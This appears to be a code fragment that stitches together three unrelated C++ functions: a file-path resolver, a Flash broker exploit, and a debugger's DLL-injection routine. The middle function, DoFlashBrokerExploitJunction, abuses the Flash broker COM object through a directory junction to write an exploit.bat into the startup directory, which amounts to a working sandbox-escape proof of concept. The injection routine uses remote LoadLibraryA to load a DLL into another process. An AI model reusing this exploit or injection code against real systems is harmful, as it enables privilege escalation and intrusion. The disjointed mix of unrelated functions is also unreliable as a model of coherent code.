std::string FileSystem::GetFullPath(const std::string& path) { std::string startup = GetStartupDirectory(); std::string p = StringHelper::Replace(path, '\\', '/'); if (p[0] == '/') { startup = GetPathRoot(startup); p = StringHelper::TrimStart(p, '/'); } else if (p[1] == ':') { return p; } int index; while ((index = p.find('/')) != std::string::npos) { std::string d = p.substr(0, index); if (d == ".") { } else if (d == "..") { if (GetPathRoot(startup) != startup) { startup = startup.substr(0, startup.find_last_of('/')); } } else { startup = StringHelper::TrimEnd(startup, '/') + "/" + d; } p = p.substr(index + 1); } return StringHelper::TrimEnd(startup, '/') + "/" + p; }
void DoFlashBrokerExploitJunction() { CLSID clsid; HRESULT hr; CLSIDFromString(L"{73c9dfa0-750d-11e1-b0c4-0800200c9a66}", &clsid); IFlashBroker5* pUnk; hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER | CLSCTX_ACTIVATE_32_BIT_SERVER, IID_PPV_ARGS(&pUnk)); if (SUCCEEDED(hr)) { DebugPrintf("Created Broker: %p\n", pUnk); bstr_t tempDir = GetTempDir(); tempDir = tempDir + L"dummy_junction"; CreateDirectoryW(tempDir, nullptr); FSLinks::DeleteJunctionPoint(tempDir); bstr_t baseDir = GetStartupDirectory(); if (FSLinks::CreateJunctionPoint(tempDir, baseDir)) { char data[] = "calc\r\n"; std::vector<unsigned char> buf; buf.resize(strlen(data)); memcpy(&buf[0], data, buf.size()); BrokerWriteFile(pUnk, tempDir + L"\\exploit.bat", buf); } else { DebugPrintf("Failed to create junction\n"); } RemoveDirectoryW(tempDir); pUnk->Release(); } else { DebugPrintf("Failed to create broker: %08X\n", hr); } }
bool DebugFrontend::InjectDll(DWORD processId, const char* dllFileName) { bool success = true; // Get the absolute path to the DLL. char fullFileName[_MAX_PATH]; if (!GetStartupDirectory(fullFileName, _MAX_PATH)) { return false; } strcat(fullFileName, dllFileName); HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, processId); if (process == NULL) { return false; } HMODULE kernelModule = GetModuleHandle("Kernel32"); FARPROC loadLibraryProc = GetProcAddress(kernelModule, "LoadLibraryA"); // Load the DLL. DWORD exitCode; char* remoteFileName = RemoteStrDup(process, fullFileName); if (!ExecuteRemoteKernelFuntion(process, "LoadLibraryA", remoteFileName, exitCode)) { success = false; } HMODULE dllHandle = reinterpret_cast<HMODULE>(exitCode); if (dllHandle == NULL) { success = false; } /* // Unload the DLL. // This is currently not needed since the process will automatically unload // the DLL when it exits, however at some point in the future we may need to // explicitly unload it so I'm leaving the code here. if (dllHandle != NULL) { if (!ExecuteRemoteKernelFuntion(process, "FreeLibrary", dllHandle, exitCode)) { success = false; } } */ if (remoteFileName != NULL) { VirtualFreeEx(process, remoteFileName, 0, MEM_RELEASE); remoteFileName = NULL; } if (process != NULL) { CloseHandle(process); } return success; }